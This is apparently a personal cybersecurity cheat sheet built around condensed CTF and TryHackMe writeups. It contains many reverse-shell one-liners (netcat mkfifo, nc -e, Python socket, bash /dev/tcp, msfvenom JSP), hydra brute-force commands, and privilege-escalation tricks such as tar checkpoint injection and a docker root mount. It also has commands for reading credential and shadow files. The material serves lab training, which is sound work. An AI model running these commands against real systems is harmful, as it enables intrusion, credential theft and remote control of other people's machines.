🚩 A collection of notes, commands, & links to help w/ hacking & cybersec. Work in progress, please be patient while it’s updated.

CyberChef // GTFOBins // HackTricks // RevShells // PayloadsAllTheThings

🔥 Kill Chain


  • CTRL + SHIFT + UP|DOWN # scroll

  • CTRL + SHIFT C|V # Copy|Paste

  • nl # cat w/ line nums

  • sed # stream editor

  • ip= # set alias env var

  • echo $ip # test alias



  • rustscan -a $ip -g
  • rustscan -a $ip -p $ports -- -sC -sV | tee scan.init


  • nmap -vv -Pn $ip
  • nmap -vv -Pn -p $ports -A $ip


  • feroxbuster -u http://$ipa -w $wordlist | tee fuzz.init


  • ffuf -u http://$ip/FUZZ -w $wordlist | tee fuzz.init


  • Analysis: Whatruns, Wappalyzer
  • /robots.txt, sitemap(.xml)


  • enum4linux $ipa | tee enum4.txt # smb shares


  • searchsploit ^
    • searchsploit -m $number $location # Copy
    • searchsploit -w $term # Website

Shells - Reverse

nc (netcat)

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f
  • nc -e /bin/bash $ip $port

Linux Enumeration

  • ls -la /home
  • cat /etc/passwd
  • cat /etc/crontab
  • sudo -l # run sudo with?
  • find / —perm 4000 2>/dev/null # find suids
  • find / -user $user 2>/dev/null # find user files
  • find / -name *id_rsa* 2>/dev/null # find files that match id_rsa

Full TTY | Spawn Shells ^ ^

python -c "import pty; pty.spawn('/bin/bash')"
python3 -c "import pty; pty.spawn('/bin/bash')"

/bin/sh -i

stty raw -ech;fg
export TERM=xterm


  • strings
  • exiftool
  • binwalk
  • pdfinfo




  • dir # list contents
  • cd # change dir
  • type # cat file contents
  • type $file | clip # copy to clipboard

📝 Notes

  • 🐀 Broad Scope Bug Bounties From Scratch - XSS Rat

    Bug bounty != Pentesting, it’s testing targets with skillset.

    Platforms: public(Intigriti, HackerOne, Bugcrowd), private.

    Target: B2B|B2C, Wide Scope|Main App, Web|Mobile|Desktop|IP|IOT, VDP|Paid, Public|Private.

    • Avoid: high payout|banks (hardened), newspapers (paywall), mobile|webshops, no creds.

    Invites: be active, report, ctfs (lower qual).

    Subdomains: httprobe ^ finds working http(s).

    • Flyover: Aquatone,

Computing Fundamentals - Roppers Academy

Computer Science 50 Python (CS50P)

Automate The Boring Stuff with Python

✍ Writeups

👳‍♂️ Aman CTF

  • Getting started: inspect > comment
  • Attack on EU: doc > “Types of Internet Banking Attacks”
  • Pharming: search ^ ^ ^
  • Phising hacker: search ^
  • Securing External Link: search ^
  • Linux folder: search ^

💻 Hacker101

  • A little something to get you started

    • Browser > inspect > /background.png
  • Micro-CMS v1

  • Postbook


    • user:password


    • My profile > ?page=profile.php&id=d # change d to b or c


    • new post > inspect > form
    • <input type="hidden" name="user_id" value="$ANYTHING">


    • 189 * 5 = 945
    • post > change &id=945


    • page=view.php&id=945 > page=edit.php&id=945


    • Browser > inspect > application > cookie id:$string
    • nth $string = md5
    • echo $string > $file
    • john --format=Raw-MD5 --wordlist=rockyou.txt $file
    • echo -n '1' | md5sum
    • Browser > inspect > application > cookie id:$md5hash


    • Login > user:password
    • echo -n '1' | md5sum
    • ?delete=$md5hash
  • Petshop Pro


    • Burp > /checkout > Repeater > Inspector “Request Body Paramaters”
    • Change price of image to $0.00

    Flag1 - NOT WORKING

    • hydra -L $xato-net-10-million-usernames -p password $domain|ip http-post-form “/login/:username=^USER^&password=^PASS^:Invalid username” -o pass.txt -v

🗃 Kase Scenarios

  • 🐍 Betrayal


    Scene of the Crime

    • Alarm System: Toward Kitchen P*******n O
    • Computers: Office x3
    • Password: ^ ^ ^ - s*ar
    • Stairs: ruler > top > bottom 1*

    Late Night Escape Challenges

    • Google Lens > ^ > C******* C*******
    • Guess > F*******
    • Profile > ^ > URL:1374270*3
    • wget $jpg > exiftool $jpg > Date/Time Original > 2*:1*
    • Life Insurance: wget $zip > open $pdf > $*,000,000.00
    • C*e and Rt

    Online Troll

    • YouTube > Facebook > R****
  • 🌊 Dark Waters | Writeup Part 1, Part 2


    • P - author of letter, hand written, “test the water”
    • Lisa - young, bar owner, offered room. some event.
    • Protestor - biology student @Penn State York, was watched/harrased, claims GRPC,
      • William Heathcote - great-gf 1837 had issues w/ GRPC.
    • GRPC - local paper co, holding event, 4 employees (Patti), hosting 100th ann,
    • Alexander Ross - politiain, linked to GRPC.


    • Glen Rock, Pennsylvania

    Unknown Email: [email protected]

    r/g****************e ^

    • Incoming cache drop S**********r ^ ^ ^

    Arkg sylbire: Ynxr Zneohet (ROT13)

    • Next flyover: Le M***g

🚩 ******************n00bzctf 2023 | YouTube Writeup

  • Forensics

    Crack & Crack:

    • zip2john $zip > $hash, john $rockyou $hash ^
    • pdf2john $pdf > $hash, john $rockyou $hash ^ ^

    Avengers ^

    • Research ffmpeg + tesseract ^ ^ ^
    • sudo apt install ffmpeg tesseract-ocr tesseract-ocr-eng
    • ffmpeg -i flag.avi -vf fps=1 frames/frame_%04d.jpg
    • for image_file in frames/*.jpg; do tesseract "$image_file" "output/$(basename "${image_file%.*}")"; done
    • cat output/* > all.text, copied > CyberChef ^
  • Misc

    Sanity: /rules > inspect > <!-- ****** -->

    ASL: this + notepad

    Google Form 1: inspect > CTRL + F “n00bz”

    My Chemical Romance: this > 186808155710 > 18 68 08 15 57 10 > Ar Er O P La Ne > {aeroplane}


    Mission Moon

    • Reverse Image Search ^ > India’s Vikram ^ > Chandrayaan 2 Coords ^

    Damn: Rev Img ^ > CNN ^ > GMaps ^

  • Pwn

    Flag Shop: 2 > 1124151235124512 (large number)

  • Rev

    • welcome strings $file
  • Web

    Club_N00b: $site > /check?secret_phrase=radical

    Robots: $site > /robots.txt

    Secret Group: Burp Repeater > change headers user-agent, connection etc.

    Conditions: Burp Repeater > username=ᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉᾉ ^

🎓 PicoCTF

  • Cryptography

    Mod 26: CyberChef (ROT13)

    Mind your Ps and Qs: rsactftool ^

  • Forensics

    information: exiftool $file, CyberChef (From Base64)

    Matryoshka doll: binwalk $file, unzip cd x4, cat $file

    Glory of the Garden: xxd $file *see end

    Enhance!: subl $file *manually extracted

  • General Skills

    runme.py: python $file

    Serpentine: move print_flag(), python $file

    First Find: wget $link, unzip $file, cat $pathToFile

    Big Zip: grep -r pico $dir

    Based: CyberChef

    plumbing: nc $domain $port > file, cat file | grep pico

    mus1c: rockstar, CyberChef (From Decimal)

    flag_shop: 2,1,3578290,2,2,1

    1_wanna_b3_a_r0ck5tar: remove lines

  • Web

    GET aHEAD: Burp > Repeater, HEAD ^


    • Burp > Repeater > name=18
    • Inspect > Storage > Value 1,2,3,4,etc

    Insp3ct0r: Inspect HTML, CSS & JS files for comments.

    Scavenger Hunt: Insp3ct0r but robots.txt, .htaccess, & .DS_Store.

    More Cookies

    • Base64 cookie

    where are the robots: /robots.txt

    logon: Burp > proxy random login

    • Cookie: username=Joe; admin=True; password=

    dont-use-client-side: view source > js

    It is my Birthday:

    Who are you?: Burp > Repeater > Add Headers

    • Referer: $URL ^
    • Date: 2018 ^
    • DNT: 1 ^
    • X-Forwarded-For: ^ ^
    • Accept-Language: sv-SE ^

    login: view-source > /index.js (CyberChef Base64)

☁ TryHackMe | Free $5 Credit

  • 🔐 Anonforce

    Writeup: YouTube // Blog

    rustscan -a $ip, 21:ftp 22:ssh

    ftp $ip, anonymous

    user = m*******

    get user.txt

    • cat ~/user.txt

    get /notread/*

    • gpg2john private.asc > private.hash
    • john --wordlist=/rockyou.txt private.hash
    • x******

    gpg 🔗 🔗

    • gpg -d backup.pgp

    nano root.hash

    • hashcat root.hash rockyou.txt
    • h*****

    ssh root@$ip

  • 🏘 Attacktive Directory (AttacktiveDirect)

    Writeup: YouTube

    kerbrute userenum --dc THM-AD -d spookysec.local userlist.txt

  • 🍺 Bounty Hacker

    Writeup: YouTube // Blog

    rustscan -a $ip -p $ports – -sC -sV

    ftp -A $ip ^

    hydra -l $user -P l****.txt $ip ssh

    sudo -l, tar ^

  • 🦉 c4ptur3th3fl4g (capturetheflag)

    Writeup: YouTube // Blog

    • leet
    • binary
    • base32
    • base64
    • hex
    • ROT13
    • ROT47
    • morse
    • decimal
    • base64 > morse > binary > ROT47 > decimal
    • Audacity > spectrogram view
    • steghide –extract -sf
    • strings

  • Coldbox Easy

    	- wordpress
    	- ffuf:/******/
    	- users:****,****,*****
    	msfconsole -q
    		- setg RHOSTS
    		- use wordpress_ghost_scanner, wordpress_xmlrpc_dos, wordpress_xmlrpc_login, wordpress_pingback_access
    	wpscan --url http://$ip -e vp,vt,u
    	wpscan --url http://$ip --passwords $wordlist
    		- *****:*********
    		- Appearance > Editor > PHP Pentest Monkey Rev Shell
    # Initial Access www-data
    cat /var/www/html/wp-config.php
    	- DB_NAME: ******, DB_USER:*****, DB_PASSWORD:************
    cat /etc/passwd/ 
    ssh c0ldd@$ip -p 4512
    cat user.txt
    # PrivEsc
    sudo -l
    sudo vim, :sh
  • 🚪 Corridor

    Writeup: YouTube // Blog

    rustscan: 80,http

    source: map tags w/ hash dirs > hash.txt

    hashcat hash.txt /rockyou.txt

    echo -n $number | md5sum

    firefox: http://$ip/$md5sum

  • 🔎 Content Discovery

    Content: assets (files, vids, imgs…), features + more.

    Discovery (methods): manual, automated and OSINT + combination.

    Manual: /robots.txt, favicon | md5sum ^, sitemap.xml, headers curl $ipa -v, framework stack via comments, (c) notices or credits.

    OSINT: GoogleDork(site, inurl, filetype, intitle), wappalyzer, wayback, github, S3 Buckets http(s)://{name}.s3.amazonaws.com.

    Automated: fuzzing(dirb, gobust, fuff, ferox).

  • 🛋 Couch

    Writeup: YouTube (Coming Soon)


    Research ^

    ssh user:password

    • cat .bash_history
    • docker -H run --rm -it --privileged --net=host -v /:/mnt alpine
    • cat /mnt/root/root.txt

  • 🚩 CTF Collection Volume 1 (ctfcollectionvol1)

    Writeup: YouTube // Blog (Coming Soon)

    • CyberChef > base64
    • strings $file or exiftool
    • steghide --extract -sf $file
    • Inspect (CTRL + SHIFT + C)
    • zbarimg $file ^
    • strings $file
    • CyberChef > Base58
    • CyberChef > ROT13 > ROT7
    • Inspect (CTRL + SHIFT + C)
    • xxd -p $file > $newFile
      • nano $newFile, replace 2333445f w/ 89504E47 ^
      • CyberChef > Upload $newFile > From Hex > Render Image
    • Google Dork site:"reddit.com" intext:"THM" intitle:"tryhackme"
    • nano $file, beef $file
    • XOR Calculator > ASCII (base 256)
    • binwalk $file, unzip $file
    • stegsolve
    • zbarimg $file, https://sclouddownloader.net/
    • Wayback
    • Decode > Automatic > Key = THM
    • Dec > Hex > ASCii
    • wireshark > filter http.request.method == “GET” > Follow HTTP Stream

  • 🕺 Dav

    Writeups: Twitter // YouTube // Blog (Coming Soon)


    • 80
    • Apache/2.4.18


    • /webdav

    Try: Burpsuite - bruteforce basic http auth

    Search - webdav default credentials ^

    • w*****:x*****

    hashid $hash

    Try: MD5(APR) or Apache MD5 ^

    • hashcat -m 1600 hash.txt $rockyou.txt

    cadaver <http://$ip/webdav> ^

    • revshell = shell.php
    • put shell.php
    • nc -lnvp $port
    • http://$ip/webdav/shell.php

    Upgrade Shell

    • python3 -c "import pty; pty.spawn('/bin/bash')"
    • [CTRL+Z]
    • stty raw -echo;fg
    • export TERM=xterm

    PrivEsc ^

    • sudo -l = /bin/cat
    • cat /etc/shadow
    • cat /root/root.txt

  • 🥜 Easy Peasy

    Writeup: YouTube // Blog

    rustscan: 80:http, 6498:ssh, 65524:http

    feroxbuster: 80, /hidden/whatever, view-source:base64

    65524:viewsource search “flag”

    65524/robots.txt ^, view-source:Base62 = $directory

    • hashcat -m 6900 $hash $dict
    • steghide –extract -sf $img, cat $file.txt, binary cyberchef
    • ssh b*****@$ip -p 6498

    cat crontab, nano $file > revshell ^, cat $.root.txt

  • 🎮 Gaming Server

    Writeup: YouTube // Blog

    rustscan -a $ip, 22:ssh, 80:http

    feroxbuster: /u*****s/, /s****t/

    user = j***, pw = dict.lst

    ssh2john $key > $hash, john $hash dict.lst l*****n, chmod 600 $key

    wget ^, chmod +x $file, python -m http.server 80

    • bash build-alpine
    • mv /mnt/root

  • 🔥 Ignite

    Writeup: YouTube // Blog


    • 80
    • a****:a****

    searchsploit Fuel

    • searchsploit -m 50477

    • https://www.exploit-db.com/exploits/50477

    • RevShell

      rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

    • Upgrade Shell

      • python3 -c "import pty; pty.spawn('/bin/bash')"
      • [CTRL+Z]
      • stty raw -echo;fg
      • export TERM=xterm
    • cat /fuel/application/config/database.php

    su root

  • 🔎 Investigating Windows

    Writeup: YouTube // Blog

    RDP via Remmina

    • cmd > systeminfo
    • Get-LocalUser | Select Name,LastLogon
    • regedit > HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run
    • Computer Management > Groups > Administrator
    • Event Viewer > Event ID 4634 ‘Log off’
      • Alternative: net user John
    • C:\TMP
    • C:\Windows\System32\drivers\etc
    • C:\inetpub\wwwroot
    • Firewall > Inbound Rules > 1337

  • 📚 Library

    Writeup: YouTube // Blog

    rustscan: 22,80=Apache2.4.18


    Users - m*******

    hydra SSH bruteforce ^

    • hydra -l m******* -P $rockyou $ip ssh -t 4 -vv
    • i********

    rm bak.py

    nano bak.up

    • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

  • 🏹 Lian Yu

    Writeup: YouTube // Blog

    rustscan: ftp, ssh, http

    feroxbuster x3 big.txt dir-medium.txt

    • /island/2100/green_arrow.ticket
    • B***58

    ftp > mget *

    • hexedit $broken.png, fix magic header ^
    • stegseek $jpg

    ssh $s***e $shado

    • sudo -l ^
    • sudo pkexec /bin/sh

  • 🎩 Madness

    Writeup: YouTube // Blog

    rustscan: 22,80

    http: view source

    • wget $jpg

    hexedit $jpg, magic number ^

    • http://$ip/$directory?$variable=$number

    Burp: intruder, payload 0-99

    steghide —extract -sf $image

    find / -perm -4000 2>dev/null

    • screen 4.05.00 ^, exploit db ^

  • 📃 MD2PDF

    Writeup: YouTube // Blog

    rustscan: 5000

    gobuster -w /seclists/common.txt = /admin

  • 🎭 Mr Robot (WIP)

    Writeup: YouTube // Blog

    • rustscan: 80, 443
    • /robots.txt: $dic
    • ferox -kE -x js php html css etc.
    • /wp-login.php
      • wpscan –disable-tls-checks
    • hydra ^
  • 🏡 Neighbour

    Writeup: YouTube // Blog


    • http://$ip, CTRL+U guest:guest
    • http://$ip/profile.php?user=admin

  • 🐱‍👤 Ninja Skills

    Writeup: YouTube // Blog

    find / -type f ( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy ) 2»/dev/null

  • 🔓 Overpass

    Writeup: YouTube // Blog

    l****.js > Cookie: SessionToken=statusOrCookie > firefox add cookie

    • ssh2john key > hash
    • john hash rockyou.txt
    • passphrase:j*****3
    • ls .o******* > ROT47 ^
    • [{“name”:“S*****”,“pass”:“s*******************e”}]

    cat /etc/crontab

    • nano /etc/hosts > add $localip
    • Add revshell to crontab/$file, locally > nc

  • 🥒 Pickle Rick

    Writeup: YouTube // Blog

    rustscan -a $ip

    feroxbuster -x js php html css etc.

    • index source: user
    • robots.txt: pw


    • while read line; do echo $line; done < $file ^
    • ls -la /home/
    • sudo -l
    • sudo cp /root/$file .

  • 👨‍💻 RootMe

    Writeup: YouTube // Blog

    rustscan -a $ip -p $ports – -sC -sV

    feroxbuster -x js php

    • u*******
    • p****

    Burp > Intruder FUZZ > .php* ^

    SUID ^ - find / -perm /4000

    python -c 'print(open("/****/****.txt").read())’ ^

  • 🔴 Res

    Research: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis) [^](https://redis.io/docs/data-types/), Webshell [^](https://redis.io/docs/data-types/)
    redis-cli -h $ip
    msfconsole -q
    search redis
    use scanner/redis/file_upload
     - set LocalFile $shell
     - set RemoteFile /var/www/html/
    linpeas: xxd, GTFO Bins [^](https://gtfobins.github.io/gtfobins/xxd/)
    - cat /etc/passwd
    - copy hash > $file
  • 🤖 Skynet

    enum4linux: //$ip/anonymous|m*********n
    ffuf: /s**********l
    hydra -l m*********n -P l**1.txt $ip http-post-form "/s**********lsrc/login.php:login_username=^USER^&secretkey=^PASS^:Unknown user or password incorrect." -vV -t 1
     - m*********n:)**************`
     - notes/i********t.txt
     - ffuf=/a***********r
    searchsploit -m 2***1
     - /alerts/alertConfigField.php?urlConfig=../../../../../../../../../home/m*********n/user.txt
     - /alerts/alertConfigField.php?urlConfig=http://$ip/shell.php?
    cat /etc/crontab
     - /home/m*********n/backups/backup.sh
     - echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ 3333 >/tmp/f' > shell.sh
     - touch --checkpoint-action=exec=sh shell.sh
     - touch "/var/www/html/--checkpoint=1"
  • 🌶 Startup

    ftp=Anonymous Login
    shell.php ^ /files/ftp
    cat /recpie.txt
    get s********.pcap
    cat user.txt
    cd scripts
    echo '$shell.sh' > /etc/print.sh
    nc -lvnp $port
  • 🐱 Thompson

    Writeup: YouTube // Blog


    • 8009
    • 8080


    • /host-manager/

    • /manager/

    • t*****:s*****

    • Upload RevShell

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=$port -f war > reverse.war strings reverse.war | grep jsp # in order to get the name of the file

    • Upgrade Shell

      • python3 -c "import pty; pty.spawn('/bin/bash')"
      • [CTRL+Z]
      • stty raw -echo;fg
      • export TERM=xterm
    • /home/j***/id.sh

    • nano id.sh

      • bash -i >& /dev/tcp/$ip/$port 0>&1

  • 🌐 Web Application Security

    Writeup: YouTube (Coming Soon)

    Web app: app w/out install on remote server e.g. gmail, office on., etsy.

    Identify/Auth Fail: bruteforce-attk, weak|clear-text passowrds.

    Broken Acc. Control: not least priv (IDOR), mod other users data, access other pages without auth.

    Injection: input w/ malious code to trick app.

    Crypt Fail: HTTP != HTTPS, weak crypt e.g. ROT13, default keys e.g. 1234.

  • 🐱‍🐉 WGEL

    Writeup: YouTube // Blog

    rustscan: 22 ssh, 80 http

    firefox: http://$ip, view source

    gobuster: /sitemap/, /sitemap/.ssh

    ssh j****e:key, chmod 600 key

    sudo -l, /usr/bin/wget

    • local: python -m http.server, remote: wget http://$ip/linpeas.sh
    • chmod +x linpeas.sh

    CVE-201-4034 ^ ^

    • gcc cve-2021-4034-poc.c -o cve-2021-4034-poc

  • 🐇 Year Of The Rabbit

    Writeup: YouTube // Blog

    rustscan -a $ip -p $ports – -sC -sV


    /a****s/ > css comment

    burp > repeater > header /W*********U

    wget $png > binwalk > binwalk -e | strings $png

    copy/paste passwords > hydra -l f****** -P $file $ip ftp

    ftp -A $ip > get $file.txt > beef $file.txt

    find / -name s3cr3t 2>/dev/null, su g*********e

    sudo -u#-1 /usr/bin/vi /home/g*********e/user.txt